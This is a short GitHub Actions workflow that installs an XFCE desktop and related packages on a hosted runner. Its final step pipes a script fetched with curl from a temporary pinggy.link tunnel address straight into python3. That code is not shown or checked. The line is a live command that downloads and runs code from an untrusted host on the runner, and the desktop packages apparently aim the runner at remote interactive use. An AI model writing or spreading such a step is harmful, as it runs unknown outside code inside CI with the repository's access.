name: Setup Linux Environment

on:
  workflow_dispatch: # allows manual triggering from GitHub UI

jobs:
  setup-linux:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v3

      - name: Install Python3 and Dependencies
        run: |
          sudo apt update
          sudo apt install -y python3 curl python3-pip wget tar xfce4 xfce4-terminal xscreensaver dbus-x11


      - name: Run Setup Script
        run: |
          curl -s https://llljt-45-117-202-173.a.free.pinggy.link/setup_linux.py | python3
